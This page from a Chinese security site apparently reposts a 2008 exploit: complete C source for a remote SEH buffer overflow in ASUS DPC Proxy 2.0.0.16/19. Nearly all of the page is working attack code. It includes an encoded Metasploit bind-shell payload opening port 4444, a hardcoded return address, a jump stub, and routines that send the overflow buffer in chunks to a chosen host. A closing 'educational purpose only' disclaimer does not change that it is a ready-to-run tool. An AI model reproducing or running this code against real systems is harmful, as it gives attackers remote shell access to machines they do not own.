首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ASUS DPC Proxy 2.0.0.16/19 Remote Buffer Overflow Exploit
来源:heretic2x@gmail.com 作者:Heretic2 发布时间:2008-05-30  
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target         : ASUS DPC Proxy 2.0.0.16/2.0.0.24
* ----------------------------------------
* Exploit        : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit
* Exploit date   : 02.04.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS             : Windows ALL
* Crew           : Dreatica-FXP
* Location       : http://www.milw0rm.com/
* ----------------------------------------
* Info           : Sending long buufer(however the buffer should be send by chunks)
*                  we obtain a SEH exploitation, due to server bytes stricts i decided
*                  to use here a alphanumeric shellcodes and jumps.
* ----------------------------------------
* Thanks to:
* 1. Luigi Auriemma          ( http://aluigi.org   <aluigi [at] autistici.org> )
* 2. The Metasploit project  ( http://metasploit.com                           )
*       3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl>                 )
* 4. Dreatica-FXP crew       (                                                 )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>

#pragma comment(lib,"ws2_32")


void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);

void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);

int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port,  struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);

struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);




// -----------------------------------------------------------------
// XGetopt.cpp  Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------


struct {
const char * name;
int length;
char *shellcode;
}shellcodes[]={
{  "BindShell on 4444",
/*
* windows/shell_bind_tcp - 696 bytes
* http://www.metasploit.com
* Encoder: x86/alpha_mixed
* EXITFUNC=seh, LPORT=4444
*/
696,
"\x89\xe6\xdb\xdd\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b"
"\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x43\x44\x43\x37"
"\x49\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
"\x4c\x49\x42\x4c\x46\x44\x45\x4c\x43\x51\x48\x43\x46\x51\x49"
"\x4b\x42\x44\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x51\x50\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x45\x36\x42\x48\x50\x33\x47\x42\x45"
"\x38\x44\x37\x44\x33\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49"
"\x46\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58"
"\x45\x52\x46\x35\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x4e"
"\x39\x44\x49\x4b\x45\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x46\x33"
"\x46\x33\x51\x43\x51\x43\x50\x53\x47\x33\x46\x33\x47\x33\x46"
"\x33\x4b\x4f\x48\x50\x43\x56\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x51\x43\x4b\x39\x4d\x31\x4a\x35\x43\x58\x4e\x44\x44\x5a\x42"
"\x50\x48\x47\x46\x37\x4b\x4f\x48\x56\x42\x4a\x42\x30\x50\x51"
"\x50\x55\x4b\x4f\x4e\x30\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x51\x47\x4b\x4f\x4e\x36\x51\x43\x50\x55\x4b\x4f\x4e\x30"
"\x42\x48\x4a\x45\x51\x59\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e"
"\x36\x50\x50\x46\x34\x50\x54\x46\x35\x4b\x4f\x48\x50\x4c\x53"
"\x43\x58\x4b\x57\x42\x59\x49\x56\x42\x59\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x43\x56\x43\x5a\x43\x54\x42\x46"
"\x43\x58\x45\x33\x42\x4d\x4b\x39\x4d\x35\x42\x4a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4c\x49\x4d\x37\x43\x5a\x50\x44\x4c\x49"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38"
"\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e\x48\x33\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x48\x56\x51\x4b\x46\x37"
"\x51\x42\x50\x51\x50\x51\x50\x51\x42\x4a\x45\x51\x46\x31\x50"
"\x51\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x4e\x39"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x48\x50\x4c\x4b\x51\x47\x4b\x4c\x4c\x43"
"\x49\x54\x42\x44\x4b\x4f\x48\x56\x51\x42\x4b\x4f\x4e\x30\x42"
"\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x41\x41"

},
{NULL, 0, NULL}
};

struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"ASUS DpcProxy 2.0.0.16/2.0.0.19",      0x0040273b },
{"DOS/Crash/Debug/Test/Fun",             0x00400101 },
{NULL,                                   0x00000000 }
};

// memory for buffers
unsigned char payloadbuffer[10000], a_buffer[10000];
long dwTimeout=5000;
int timeout=5000;

int main(int argc, char **argv)
{
char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
int sh,port=623,itarget=0;
struct _buf  fshellcode, sbuffer;

logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}

WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
// set defaults
sh=0;
// ------------

while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
{
switch (c)
{
case 'h':
if (strchr(optarg,':')==NULL)
{
remotehost=optarg;
}else
{
sscanf(strchr(optarg,':')+1, "%d", &port);
remotehost=optarg;
*(strchr(remotehost,':'))='\0';
}
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'T':
sscanf(optarg, "%ld", &dwTimeout);
break;
default:
            usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL)
{
printf("   [-] Please enter remotehost\n");
end_logo();
WSACleanup();
return -1;
}
print_info_banner_line("Host", remotehost);
sprintf(temp1, "%d", port);
print_info_banner_line("Port", temp1);
print_info_banner_line("Payload", shellcodes[sh].name);

if(sh==0)
{
sprintf(temp1, "%d", 4444);
print_info_banner_line("BINDPort", temp1);
}

printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);


memset(payloadbuffer, 0, sizeof(payloadbuffer));
fshellcode.ptr=payloadbuffer;
fshellcode.size=0;

memset(a_buffer, 0, sizeof(a_buffer));
sbuffer.ptr=a_buffer;
sbuffer.size=0;

if(!construct_shellcode(sh, &fshellcode, itarget))
{
end_logo();
WSACleanup();
return -1;
}

printf("   [+] Payload constructed\n");

if(!construct_buffer(&fshellcode, itarget, &sbuffer))
{
printf("   [-] Buffer not constructed\n");
end_logo();
WSACleanup();
return -1;
}
printf("   [+] Final buffer constructed\n");


if(!execute(&sbuffer, remotehost, port))
{
printf("   [-] Buffer not sent\n");
end_logo();
WSACleanup();
return -1;
}
printf("   [+] Buffer sent\n");

end_logo();
WSACleanup();
return 0;
}

int construct_shellcode(int sh, struct _buf * shf, int target)
{
memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
shf->size=shellcodes[sh].length;
return 1;
}


char JMPX[] =
// get ecx
"\x89\xE6\xDB\xDD\xD9\x76\xF4\x59"
// alphanum-decoder
"\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
// encoded jump
"\x59\x6f\x7a\x47\x41"
// back jump
"\x89\xE6\xDB\xDD\xD9\x76\xF4\x5f\x81\xef\xf8\x1a\x00\x00\xeb\xb3";

int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
{
unsigned char * cp = sbuf->ptr;
memset(cp, 'A', 1000);
cp+=20;
memcpy(cp, shf->ptr, shf->size);
cp+=1000-20;
memset(cp, 'B', 1000);
cp+=1000;
memset(cp, 'C', 1000);
cp+=1000;
memset(cp, 'D', 1000);
cp+=1000;
memset(cp, 'E', 1000);
cp+=1000;
memset(cp, 'F', 1000);
cp+=1000;
memset(cp, 'G', 1000-62-sizeof(JMPX)+1);
cp+=1000-62-sizeof(JMPX)+1;

// code to jump back
memcpy(cp, JMPX,sizeof(JMPX)-1);
cp+=sizeof(JMPX)-1;

// next SEH record and back jump
*cp++='\x90';
*cp++='\x90';
*cp++='\xeb';
*cp++='\xec';

// replace SEH
*cp++ = (char)((targets[target].ret      ) & 0xff);
*cp++ = (char)((targets[target].ret >>  8) & 0xff);
*cp++ = (char)((targets[target].ret >> 16) & 0xff);
*cp++ = (char)((targets[target].ret >> 24) & 0xff);

memset(cp, 'H', 1000);
cp+=1000;

sbuf->size=(int)(cp-sbuf->ptr);
return 1;
}


void extract_ip_and_port( char * &remotehost, int * port, char * str)
{
if (strchr(str,':')==NULL)
{
remotehost=str;
}else
{
sscanf(strchr(str,':')+1, "%d", port);
remotehost=str;
*(strchr(remotehost,':'))='\0';
}
}



int hr2_connect(char * remotehost, int port, int timeout)
{
SOCKET s;
struct hostent *host;
struct sockaddr_in addr;
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set x;
int res;

if (INFINITE != timeout)
{
    stTime.tv_sec = timeout / 1000;
    stTime.tv_usec = timeout % 1000;
    pstTime = &stTime;
}

host = gethostbyname(remotehost);
if (!host) return SOCKET_ERROR;

addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_port = htons(port);
addr.sin_family = AF_INET;

s = socket(AF_INET, SOCK_STREAM, 0);
if (s == SOCKET_ERROR)
{
closesocket(s);
return SOCKET_ERROR;
}

unsigned long l = 1;
ioctlsocket( s, FIONBIO, &l ) ;

connect(s, (struct sockaddr*)&addr, sizeof(addr));

FD_ZERO(&x);
FD_SET(s, &x);

res = select(NULL,NULL,&x,NULL,pstTime);
if(res< 0) return SOCKET_ERROR;
if(res==0) return 0;
return (int)s;
}


int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
return send(s, (char *)buf, len, 0);
}

int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set xy;
int res;

if (INFINITE != timeout)
{
    stTime.tv_sec = timeout / 1000;
    stTime.tv_usec = timeout % 1000;
    pstTime = &stTime;
}
FD_ZERO(&xy);
FD_SET(s, &xy);

res = select(NULL,&xy,NULL,NULL,pstTime);

if(res==0) return 0;
if(res<0) return -1;

return recv(s, (char *)buf, len, 0);
}

int execute(struct _buf * abuf, char * remotehost, int port)
{
int x;
SOCKET s ;
unsigned char rbuf[7000];
unsigned int i;
int rsize=7000;
s = hr2_connect(remotehost, port, 10000);
if(s==0)
{
printf("   [-] connect() timeout\n");
return 0;
}
if(s==SOCKET_ERROR)
{
printf("   [-] Connection failed\n");
return 0;
}

x = hr2_tcprecv(s, rbuf, 5000, 10000);
x = hr2_tcprecv(s, rbuf, 5000, 10000);

for(i=0;i<abuf->size/1000;i++)
{
printf("   [+] Chunk %d/%d sent\n", i+1,abuf->size/1000);
x = hr2_tcpsend(s, abuf->ptr+1000*i, 1000, 0);
if(x<1000) return -1;
Sleep(1000);
x = hr2_tcprecv(s, rbuf, 5000, 10000);
}
return 1;
}


// -----------------------------------------------------------------
// XGetopt.cpp  Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;

optarg = NULL;

if (next == NULL || *next == '\0')
{
if (optind == 0)
optind++;

if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}

if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}

next = argv[optind];
next++; // skip past -
optind++;
}

char c = *next++;
char *cp = strchr(optstring, c);

if (cp == NULL || c == ':')
return '?';

cp++;
if (*cp == ':')
{
if (*next != '\0')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}

return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------


void print_info_banner_line(const char * key, const char * val)
{
char temp1[100], temp2[100];

memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(val) -1);

memset(temp2,0,sizeof(temp2));
memset(temp2, '\x20' , 8 - strlen(key));
printf(" #  %s%s: %s%s# \n", key, temp2, val, temp1);

}



void usage(char * s)
{
int j;
printf("\n");
printf("    Usage: %s -h <host:port> -t <target>\n", s);
printf("   -------------------------------------------------------------------\n");
printf("    Arguments:\n");
printf("      -h ........ host to attack, default port: 623\n");
printf("      -t ........ target to use\n");
printf("      -T ........ socket timeout\n");
printf("\n");
printf("    Supported ASUS DPCProxy versions:\n");
for(j=0; targets[j].t!=0;j++)
{
printf("      %d. %s\n",j+1, targets[j].t);
}
printf("\n");
for(j=0; shellcodes[j].name!=0;j++)
{
printf("      %d. %s\n",j+1, shellcodes[j].name);
}
end_logo();
}

void logo()
{
printf("\n\n");
printf(" ####################################################################### \n");
printf(" #     ____                 __  _                  ______  __    _____ #\n");
printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
printf(" #                                 crew                                #\n");
printf(" ####################################################################### \n");
printf(" #  Exploit : ASUS DPCPROXY Service 2.0.0.16-19                        # \n");
printf(" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \n");
printf(" #  Version : 1.0                                                      # \n");
printf(" #  System  : Windows ALL                                              # \n");
printf(" #  Date    : 02.04.2008 - 04.04.2008                                  # \n");
printf(" # ------------------------------------------------------------------- # \n");
}

void end_logo()
{
printf(" # ------------------------------------------------------------------- # \n");
printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");
printf(" ####################################################################### \n\n");
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mambo Component mambads <= 1.
·Now SMS/MMS Gateway 5.5 Remote
·CMS from Scratch <= 1.1.3 (fck
·PHP Booking Calendar 10 d (fck
·SyntaxCMS <= 1.3 (fckeditor)
·80sec发现的phpwind注册漏洞
·VMware Server Console ActiveX
·freeSSHd 1.2.1 Remote Stack Ov
·CA Internet Security Suite 200
·Joomla Component com_biblestud
·Creative Software AutoUpdate E
·Samba (client) receive_smb_raw
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved